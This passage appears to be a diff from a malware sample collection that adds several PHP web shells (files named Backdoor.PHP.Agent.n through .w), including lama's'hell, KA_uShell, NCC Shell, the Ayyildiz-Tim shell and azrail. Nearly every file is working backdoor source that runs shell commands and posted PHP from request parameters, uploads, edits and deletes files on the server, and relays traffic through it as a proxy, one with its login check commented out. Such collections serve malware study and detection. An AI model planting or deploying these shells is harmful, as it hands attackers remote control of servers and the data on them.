echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";

89
PHP/Backdoor.PHP.Agent.n Normal file
View File

@ -0,0 +1,89 @@
<?
if($_POST['dir'] == "") {
$curdir = `pwd`;
} else {
$curdir = $_POST['dir'];
}
if($_POST['king'] == "") {
$curcmd = "ls -lah";
} else {
$curcmd = $_POST['king'];
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>lama's'hell v. 3.0</title>
<style type="text/css">
body {
color: white; background-color: black;
font-size: 12px;
font-family: Helvetica,Arial,Sans-Serif;
}
</style>
</head>
<body>
<pre>
_ _
/ \_______ /|_\
/ /_/ \__
/ \_/ /
_|_ |/|_
_|_ O _ O _|_
_|_ (_) _|_
\ /
_\_____________/_
/ \/ (___) \/ \
\__( o o )__/ <?
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
echo "SM: 1 \\ ";
} else {
echo "SM: 0 \\ ";
}
if(''==$df) {
echo "DF: 0 \\ ";
} else {
echo "DF: ".$df." \\ ";
}
echo "".php_uname()."\n";
?>
<hr></pre>
<table><form method="post" enctype="multipart/form-data">
<tr><td><b>Execute command:</b></td><td><input name="king" type="text" size="100" value="<? echo $curcmd; ?>"></td>
<tr><td><b>Change directory:</b></td><td><input name="dir" type="text" size="100" value="<? echo $curdir; ?>"></td>
<td><input name="exe" type="submit" value="Execute"></td></tr>
<tr><td><b>Upload file:</b></td><td><input name="fila" type="file" size="90"></td>
<td><input name="upl" type="submit" value="Upload"></td></tr>
</form></table>
<pre><hr>
<?
if(($_POST['upl']) == "Upload" ) {
if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) {
echo "The file has been uploaded<br><br>";
} else {
echo "There was an error uploading the file, please try again!";
}
}
if(($_POST['exe']) == "Execute") {
$curcmd = "cd ".$curdir.";".$curcmd;
$f=popen($curcmd,"r");
while (!feof($f)) {
$buffer = fgets($f, 4096);
$string .= $buffer;
}
pclose($f);
echo htmlspecialchars($string);
}
?>
</pre>
</body>
</html>

229
PHP/Backdoor.PHP.Agent.o Normal file
View File

@ -0,0 +1,229 @@
<!--
/+--------------------------------+\
| KA_uShell |
| <KAdot Universal Shell> |
| Version 0.1.6 |
| 13.03.04 |
| Author: KAdot <KAdot@ngs.ru> |
|--------------------------------|
\+ +/
-->
<html>
<head>
<title>KA_uShell 0.1.6</title>
<style type="text/css">
<!--
body, table{font-family:Verdana; font-size:12px;}
table {background-color:#EAEAEA; border-width:0px;}
b {font-family:Arial; font-size:15px;}
a{text-decoration:none;}
-->
</style>
</head>
<body>
<?php
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
// Configuration
$login = "admin";
$pass = "123";
/*/ Authentication
if (!isset($_SERVER['PHP_AUTH_USER'])) {
header('WWW-Authenticate: Basic realm="KA_uShell"');
header('HTTP/1.0 401 Unauthorized');
exit;}
else {
if(empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_PW']<>$pass || empty($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']<>$login)
{ echo "×òî íàäî?"; exit;}
}
*/
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "shell";}
// Menu
echo "
|<a href=$self?ac=shell>Shell</a>|
|<a href=$self?ac=upload>File Upload</a>|
|<a href=$self?ac=tools>Tools</a>|
|<a href=$self?ac=eval>PHP Eval Code</a>|
|<a href=$self?ac=whois>Whois</a>|
<br><br><br><pre>";
switch($ac) {
// Shell
case "shell":
echo <<<HTML
<b>Shell</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="shell">
<tr><td>
$$sern <input size="50" type="text" name="c"><input align="right" type="submit" value="Enter">
</td></tr>
<tr><td>
<textarea cols="100" rows="25">
HTML;
if (!empty($_POST['c'])){
passthru($_POST['c']);
}
echo "</textarea></td>$tend";
break;
//PHP Eval Code execution
case "eval":
echo <<<HTML
<b>PHP Eval Code</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="eval">
<tr>
<td><textarea name="ephp" rows="10" cols="60"></textarea></td>
</tr>
<tr>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (isset($_POST['ephp'])){
eval($_POST['ephp']);
}
break;
//Text tools
case "tools":
echo <<<HTML
<b>Tools</b>
<table>
<form method="POST" action="$self">
<input type="hidden" name="ac" value="tools">
<tr>
<td>
<input type="radio" name="tac" value="1">B64 Decode<br>
<input type="radio" name="tac" value="2">B64 Encode<br><hr>
<input type="radio" name="tac" value="3">md5 Hash
</td>
<td><textarea name="tot" rows="5" cols="42"></textarea></td>
</tr>
<tr>
<td> </td>
<td><input type="submit" value="Enter"></td>
$tend
HTML;
if (!empty($_POST['tot']) && !empty($_POST['tac'])) {
switch($_POST['tac']) {
case "1":
echo "Ðàñêîäèðîâàííûé òåêñò:<b>" .base64_decode($_POST['tot']). "</b>";
break;
case "2":
echo "Êîäèðîâàííûé òåêñò:<b>" .base64_encode($_POST['tot']). "</b>";
break;
case "3":
echo "Êîäèðîâàííûé òåêñò:<b>" .md5($_POST['tot']). "</b>";
break;
}}
break;
// Uploading
case "upload":
echo <<<HTML
<b>File Upload</b>
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<td>Ôàéëî:</td>
<td><input size="48" name="file" type="file"></td>
</tr>
<tr>
<td>Ïàïêà:</td>
<td><input size="48" value="$docr/" name="path" type="text"><input type="submit" value="Ïîñëàòü"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}
if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
echo "Ôàéëî óñïåøíî çàãðóæåí â ïàïêó $uploadfile\n";
echo "Èìÿ:" .$_FILES['file']['name']. "\n";
echo "Ðàçìåð:" .$_FILES['file']['size']. "\n";
} else {
print "Íå óäà¸òñÿ çàãðóçèòü ôàéëî. Èíôà:\n";
print_r($_FILES);
}
}
break;
// Whois
case "whois":
echo <<<HTML
<b>Whois</b>
<table>
<form action="$self" method="POST">
<input type="hidden" name="ac" value="whois">
<tr>
<td>Äîìåí:</td>
<td><input size="40" type="text" name="wq"></td>
</tr>
<tr>
<td>Õóéç ñåðâåð:</td>
<td><input size="40" type="text" name="wser" value="whois.ripe.net"></td>
</tr>
<tr><td>
<input align="right" type="submit" value="Enter">
</td></tr>
$tend
HTML;
if (isset($_POST['wq']) && $_POST['wq']<>"") {
if (empty($_POST['wser'])) {$wser = "whois.ripe.net";} else $wser = $_POST['wser'];
$querty = $_POST['wq']."\r\n";
$fp = fsockopen($wser, 43);
if (!$fp) {echo "Íå ìîãó îòêðûòü ñîêåò";} else {
fputs($fp, $querty);
while(!feof($fp)){echo fgets($fp, 4000);}
fclose($fp);
}}
break;
}
?>
</pre>
</body>
</html>

1033
PHP/Backdoor.PHP.Agent.p Normal file
View File

File diff suppressed because it is too large Load Diff

1231
PHP/Backdoor.PHP.Agent.r Normal file
View File

File diff suppressed because it is too large Load Diff

1492
PHP/Backdoor.PHP.Agent.s Normal file
View File

File diff suppressed because it is too large Load Diff

60
PHP/Backdoor.PHP.Agent.u Normal file
View File

@ -0,0 +1,60 @@
<center>
<h1>.:NCC:. Shell v1.0.0</h1>
<title>.:NCC:. Shell v1.0.0</title>
<head><h2>Hacked by Silver</h2></head>
<h1>---------------------------------------------------------------------------------------</h1><br>
<b><font color=red>---Server Info---</font></b><br>
<?php
echo "<b><font color=red>Safe Mode on/off: </font></b>";
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font color=#FF0000><b>Safe Mode ON</b></font>';
} else {
print '<font color=#008000><b>Safe Mode OFF</b></font>';
}
echo "</br>";
echo "<b><font color=red>Momentane Directory: </font></b>"; echo $_SERVER['DOCUMENT_ROOT'];
echo "</br>";
echo "<b><font color=red>Server: </font></b><br>"; echo $_SERVER['SERVER_SIGNATURE'];
echo "<a href='$php_self?p=info'>PHPinfo</a>";
if(@$_GET['p']=="info"){
@phpinfo();
exit;}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>- Upload -</h2>
<title>Upload - Shell/Datei</title>
<form
action="<?php echo $_SERVER['PHP_SELF']; ?>"
method="post"
enctype="multipart/form-data">
<input type="file" name="Upload" />
<input type="submit" value="Upload!" />
</form>
<hr />
<?php
if (isset($_FILES['probe']) and ! $_FILES['probe']['error']) {
// Alternativ: and $_FILES['probe']['size']
move_uploaded_file($_FILES['probe']['tmp_name'], "./dingen.php");
printf("Die Datei %s wurde als dingen.php hochgeladen.<br />\n",
$_FILES['probe']['name']);
printf("Sie ist %u Bytes groß und vom Typ %s.<br />\n",
$_FILES['probe']['size'], $_FILES['probe']['type']);
}
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>IpLogger</h2>
<?php
echo "<b><font color=red><br>IP: </font></b>"; echo $_SERVER['REMOTE_ADDR'];
echo "<b><font color=red><br>PORT: </font></b>"; echo $_SERVER['REMOTE_PORT'];
echo "<b><font color=red><br>BROWSER: </font></b>"; echo $_SERVER[HTTP_REFERER];
echo "<b><font color=red><br>REFERER: </font></b>"; echo $_SERVER['HTTP_USER_AGENT'];
?>
<h1>---------------------------------------------------------------------------</h1><br>
<h2>Directory Lister</h2>
<? $cmd = $_REQUEST["-cmd"];?><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value=<?=$cmd?>><hr><pre><?if($cmd != "") print Shell_Exec($cmd);?></pre></form><br>
<h1>---------------------------------------------------------------------------</h1><br>
<b>--Coded by Silver©--<br>
~|_Team .:National Cracker Crew:._|~<br>
<a href="http://www.n-c-c.6x.to" target="_blank">-->NCC<--</a></center></b></html>

317
PHP/Backdoor.PHP.Agent.v Normal file
View File

@ -0,0 +1,317 @@
<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Ayyildiz Tim | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
</head>
<body>
</body>
</html>
<html>
<head>
<meta name="distribution" content="GLOBAL">
<META name="ROBOTS" content="ALL">
<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
<meta name="Copyright" content=TouCh By iJOo">
<META NAME="RATING" CONTENT="GENERAL">
<meta name="Description" content="Thehacker">
<meta name="KeyWords" content="DefaCed">
<title>HACKED BY AYYILDIZ </title>
<STYLE TYPE="text/css">
<!--
body {
scrollbar-3d-light-color : #404040;
scrollbar-arrow-color: black;
scrollbar-base-color: black;
scrollbar-darkshadow-color: #404040;
scrollbar-face-color: black;
scrollbar-highlight-color: #404040;
scrollbar-shadow-color: black;
scrollbar-track-color: #404040; }
-->
</STYLE>
<script language="JavaScript1.2">
function disableselect(e){
return false
}
function reEnable(){
return true
}
//if IE4+
document.onselectstart=new Function ("return false")
//if NS6
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
</head>
<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
<bgsound src="bayrak.mp3" loop="infinite">
<center><font color="red" size="10" face="Imprint MT Shadow">
</font>
<TR>
<TD vAlign=center align=left width=144>
<SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
</TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><BR>
<P align=left></P></TD></TR>
<TR>
<TD vAlign=center align=left width=144></TD>
<TD vAlign=center align=left width=5></TD>
<TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
<STYLE>BODY {
BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
}
.ldtab1 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab2 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtab3 {
BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
}
.ldtxt1 {
PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
}
.ldtxt2 {
FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:link {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:visited {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:active {
FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
}
A:hover {
BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
}
A {
TEXT-DECORATION: none
}
</STYLE>
<!-- MELEK -->
<DIV align=center>
<DIV id=welle
style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT
color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT
color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT
color=#ff0000></DIV></DIV>
<DIV align=center></DIV>
<SCRIPT language=JavaScript>
<!--
function welle()
{
if(document.all.welle.filters[0].freq > 10)
document.all.welle.filters[0].freq = 5;
document.all.welle.filters[0].freq += 1;
if(document.all.welle.filters[0].phase > 100)
document.all.welle.filters[0].phase = 0;
document.all.welle.filters[0].phase += 10;
if(document.all.welle.filters[0].strength > 10)
document.all.welle.filters[0].strength = 1;
document.all.welle.filters[0].strength += 1;
window.setTimeout("welle()",100);
}
welle();
file://-->
</SCRIPT>
</FONT></TD></TR></TBODY></TABLE></DIV>
<?php
define('PHPSHELL_VERSION', '');
?>
<html>
<head>
<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
<style type="text/css">
<!--
.style1 {color: #FF0000}
.style2 {
font-family: Tahoma;
font-size: 9px;
font-weight: bold;
}
-->
</style>
</head>
<body>
<div align="center">
<table width="918" height="484" border="15">
<tr>
<td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
<div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span> <?php
if (ini_get('register_globals') != '1') {
/* We'll register the variables as globals: */
if (!empty($HTTP_POST_VARS))
extract($HTTP_POST_VARS);
if (!empty($HTTP_GET_VARS))
extract($HTTP_GET_VARS);
if (!empty($HTTP_SERVER_VARS))
extract($HTTP_SERVER_VARS);
}
/* First we check if there has been asked for a working directory. */
if (!empty($work_dir)) {
/* A workdir has been asked for */
if (!empty($command)) {
if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
/* We try and match a cd command. */
if ($regs[1][0] == '/') {
$new_dir = $regs[1]; // 'cd /something/...'
} else {
$new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
}
if (file_exists($new_dir) && is_dir($new_dir)) {
$work_dir = $new_dir;
}
unset($command);
}
}
}
if (file_exists($work_dir) && is_dir($work_dir)) {
/* We change directory to that dir: */
chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar': */
$work_dir = exec('pwd');
?>
</div>
<form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
<p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
<?php
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
$path = '';
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$path .= '/' . $work_dir_splitted[$i];
printf('<a href="%s?work_dir=%s">%s</a>/',
$PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
}
}
?>
</b></p>
<p align="center"><strong>Dizin Degistir</strong> :
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == '.') {
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
} elseif ($dir == '..') {
/* We have found the parent dir. We must be carefull if the parent
directory is the root directory (/). */
if (strlen($work_dir) == 1) {
/* work_dir is only 1 charecter - it can only be / There's no
parent directory then. */
} elseif (strrpos($work_dir, '/') == 0) {
/* The last / in work_dir were the first charecter.
This means that we have a top-level directory
eg. /bin or /home etc... */
echo "<option value=\"/\">Parent Directory</option>\n";
} else {
/* We do a little bit of string-manipulation to find the parent
directory... Trust me - it works :-) */
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
} else {
if ($work_dir == '/') {
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
} else {
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
}
closedir($dir_handle);
?>
</select>
</p>
<p align="center"><strong>Komut</strong>:
<input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Komut Calistir">
</p>
<p align="center"><strong>Surekli Bagli Kal</strong>
<input type="checkbox" name="stderr">
</p>
<div align="center">
<textarea name="textarea" cols="80" rows="20" readonly>
<?php
if (!empty($command)) {
if ($stderr) {
$tmpfile = tempnam('/tmp', 'phpshell');
$command .= " 1> $tmpfile 2>&1; " .
"cat $tmpfile; rm $tmpfile";
} else if ($command == 'ls') {
/* ls looks much better with ' -F', IMHO. */
$command .= ' -F';
}
system($command);
}
?>
</textarea>
</div>
</form>
<div align="center">
<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>
</div> <hr align="center"> <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
<p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
<p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
</tr>
</table>
</div>
</body>
</html>
</font></font></font></font></font></font></font></font></font></font></font>
</font>
<!--
/*
I Always Love Sha
*/
</BODY></HTML>

284
PHP/Backdoor.PHP.Agent.w Normal file
View File

@ -0,0 +1,284 @@
<?php
$default=$DOCUMENT_ROOT;
$this_file="./azrailphp.php";
if(isset($save)){
$fname=str_replace(" ","_",$fname);
$fname=str_replace("%20","_",$fname);
header("Cache-control: private");
header("Content-type: application/force-download");
header("Content-Length: ".filesize($save));
header("Content-Disposition: attachment; filename=$fname");
$fp = fopen($save, 'r');
fpassthru($fp);
fclose($fp);
unset($save);
exit;
}
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
function deltree($deldir) {
$mydir=@dir($deldir);
while($file=$mydir->read()) {
if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
@chmod("$deldir/$file",0777);
deltree("$deldir/$file");
}
if (is_file("$deldir/$file")) {
@chmod("$deldir/$file",0777);
@unlink("$deldir/$file");
}
}
$mydir->close();
@chmod("$deldir",0777);
echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SÝLÝNDÝ:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
}
if ($op=='phpinfo'){
$fonk_kap = get_cfg_var("fonksiyonlarý_kapat");
echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu Çalýþmýyiii</center>";
exit;
}
echo "<html>
<head>
<title>azrail 1.0 by C-W-M</title>
</head>
<body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
</body>";
echo "<center><font size='+3' color='#FF0000'><b> aZRaiLPhp v1.0!!!</b></font></center><br>
<center><font size='+2' color='#FFFFFF'>C-W-M</font><font size='+2' color='#FF0000'>HACKER</font><br>
<br>";
echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
echo "<br>
<br>";
echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
echo "<div align=center>
<font size='+1' color='#0000FF'>Root Klasör: $DOCUMENT_ROOT</font><br>
<font size='+1'color='#0000FF'>aZRaiLPhP'nin URL'si: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
if(!isset($dir)){
$dir="$default";
}
echo "<input type=text size=60 name=dir value='$dir'>
<input type=submit value='GIT'><br>
</form>
</div>";
if ($op=='up'){
$path=dir;
echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
if(isset($dosya_gonder)) {
if (copy ( $dosya_gonder, "$dir/$dosya_gonder_name" )){
echo "<center><font color='#0000FF'>Dosya Baþarýyla Gönderildi</font></center>";
}
} elseif(empty($dosya_gonder)) {
$path=$dir;
$dir = $dosya_dizin;
echo "$dir";
echo "<FORM ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
echo "</form>";
echo "</html>";
} else {
die ("<center><font color='#FF0000'>Dosya kopyalanamýyor!</font><center>");
}
}
if($op=='mf'){
$path=$dir;
if(isset($dismi) && isset($kodlar)){
$ydosya="$path/$dismi";
if(file_exists("$path/$dismi")){
$dos= "Böyle Bir Dosya Vardý Üzerine Yazýldý";
} else {
$dos = "Dosya Oluþturuldu";
}
touch ("$path/$dismi") or die("Dosya Oluþturulamýyor");
$ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak için açýlamýyor");
fwrite($ydosya2, $kodlar) or die("Dosyaya yazýlamýyor");
fclose($ydosya2);
echo "<center><font color='#0000FF'>$dos</font></center>";
} else {
echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
echo "<center>Dosya Ýsmi :<input type='text' name='dismi'></center><br>";
echo "<br>";
echo "<center>KODLAR</center><br>";
echo "<center><TEXTAREA NAME='kodlar' ROWS='19' COLS='52'></TEXTAREA></center>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
}
if($op=='md'){
$path=$dir;
if(isset($kismi) && isset($okmf)){
$klasör="$path/$kismi";
mkdir("$klasör", 0777) or die ("<center><font color='#0000FF'>Klasör Oluþturulamýyor</font></center>");
echo "<center><font color='#0000FF'>Klasör Oluþturuldu</font></center>";
}
echo "<FORM METHOD='POST' ACTION='$this_file?op=md&dir=$path'>";
echo "<center>Klasör Ýsmi :<input type='text' name='kismi'></center><br>";
echo "<br>";
echo "<center><INPUT TYPE='submit' name='okmf' value='TAMAM'></center>";
echo "</form>";
}
if($op=='del'){
unlink("$fname");
}
if($op=='dd'){
$dir=$here;
$deldirs=$yol;
if(!file_exists("$deldirs")) {
echo "<font color=\"#ff0000\">Dosya Yok</font>";
} else {
deltree($deldirs);
}
}
if($op=='edit'){
$yol=$fname;
$yold=$path;
if (isset($ok)){
$dosya = fopen("$yol", 'w') or die("Dosya Açýlamýyor");
$metin=$tarea;
fwrite($dosya, $metin) or die("Yazýlamýyor!");
fclose($dosya);
echo "<center><font color='#0000FF'Dosya Baþarýyla Düzenlendi</font></center>";
} else {
$path=$dir;
echo "<center>DÜZENLE: $yol</center>";
$dosya = fopen("$yol", 'r') or die("<center><font color='#FF0000'Dosya Açýlamýyor</font></center>");
$boyut=filesize($yol);
$duzen = @fread ($dosya, $boyut);
echo "<form method=post action=$this_file?op=edit&fname=$yol&dir=$path>";
echo "<center><TEXTAREA style='WIDTH: 476px; HEIGHT: 383px' name=tarea rows=19 cols=52>$duzen</TEXTAREA></center><br>";
echo "<center><input type='Submit' value='TAMAM' name='ok'></center>";
fclose($dosya);
$duzen=htmlspecialchars($duzen);
echo "</form>";
}
}
if($op=='efp2'){
$fileperm=base_convert($_POST['fileperm'],8,10);
